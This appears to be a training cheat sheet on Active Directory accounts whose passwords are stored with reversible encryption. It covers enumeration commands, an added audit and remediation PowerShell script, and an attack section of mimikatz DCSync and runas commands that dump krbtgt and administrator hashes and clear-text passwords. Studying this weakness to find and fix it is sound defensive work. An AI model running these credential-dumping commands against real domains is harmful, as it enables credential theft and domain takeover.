
reverse-encryption-password-storage-attack

When this option is set on a user account, the password is not stored in plaintext; it is stored RC4-encrypted, which is reversible by anyone who holds the key.

The trick is that the key material needed to decrypt them is derived from the Syskey (boot key) held in the registry, which a domain admin or equivalent can extract. Tools such as secretsdump.py decrypt any passwords stored with reversible encryption while dumping the NTDS file.

Any password set on an account while this setting is enabled is stored with reversible encryption until it is next changed (clearing the flag alone does not remove the stored value), and the accounts carrying the flag can be enumerated.

Check for reversible encryption option

```powershell
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
```

Check for reversible encryption option

```powershell
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} | select samaccountname,useraccountcontrol
```
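An added audit script (not from the original page) that turns the enumeration above into a defensive check: besides the per-account UAC flag it catches reversible encryption switched on by the default domain or a fine-grained password policy, which sets no per-account flag, and it clears the flag together with a forced password change so the already-stored value is replaced. Cmdlets are from the RSAT ActiveDirectory module; the function names are assumptions.

```powershell
# Added example (not from the original page): audit a domain for reversible-encryption
# exposure. Assumes the ActiveDirectory RSAT module; Clear-ReversibleEncryptionFlag
# needs account-management rights. Function names are hypothetical.
Import-Module ActiveDirectory

# ENCRYPTED_TEXT_PWD_ALLOWED is bit 0x80 (decimal 128) of userAccountControl.
$ENCRYPTED_TEXT_PWD_ALLOWED = 0x80

function Get-ReversibleEncryptionExposure {
    # Policy-level exposure: the default domain password policy or a fine-grained
    # policy can turn on reversible storage for everyone it applies to, without the
    # per-account UAC flag ever being set, so a UAC-only check misses it.
    if ((Get-ADDefaultDomainPasswordPolicy).ReversibleEncryptionEnabled) {
        Write-Warning 'Default domain password policy stores passwords with reversible encryption.'
    }
    Get-ADFineGrainedPasswordPolicy -Filter * |
        Where-Object { $_.ReversibleEncryptionEnabled } |
        ForEach-Object { Write-Warning "PSO '$($_.Name)' enables reversible encryption for: $($_.AppliesTo -join ', ')" }

    # Account-level exposure: LDAP bitwise-AND matching rule on the UAC flag.
    Get-ADUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=$ENCRYPTED_TEXT_PWD_ALLOWED)" `
               -Properties userAccountControl, pwdLastSet |
        ForEach-Object {
            [PSCustomObject]@{
                SamAccountName     = $_.SamAccountName
                Enabled            = $_.Enabled
                # A password set while the flag was on stays decryptable until changed.
                PasswordLastSet    = [DateTime]::FromFileTime($_.pwdLastSet)
                UserAccountControl = '0x{0:X}' -f $_.userAccountControl
            }
        }
}

function Clear-ReversibleEncryptionFlag {
    # Clearing the flag only protects future passwords; the current one remains
    # decryptable until it is changed, so a reset at next logon is forced too.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory, ValueFromPipelineByPropertyName)][string]$SamAccountName)
    process {
        if ($PSCmdlet.ShouldProcess($SamAccountName, 'Disable reversible encryption and force password change')) {
            Set-ADAccountControl -Identity $SamAccountName -AllowReversiblePasswordEncryption $false
            Set-ADUser -Identity $SamAccountName -ChangePasswordAtLogon $true
        }
    }
}

Get-ReversibleEncryptionExposure | Format-Table -AutoSize
# Remediate after review: Get-ReversibleEncryptionExposure | Clear-ReversibleEncryptionFlag -WhatIf
```

Run the remediation with -WhatIf first; it prints what would be changed without touching any account.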

Attack

```powershell
.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt" exit
```

Reversible encryption password attack (mimikatz)

Run PowerShell as a different user (one who holds DCSync rights)

```powershell
runas /netonly /user:INLANEFREIGHT\CT059 powershell
```

Attacking (PowerShell)

```powershell
.\mimikatz.exe "privilege::debug lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator" exit
```

Get all hashes and clear-text passwords
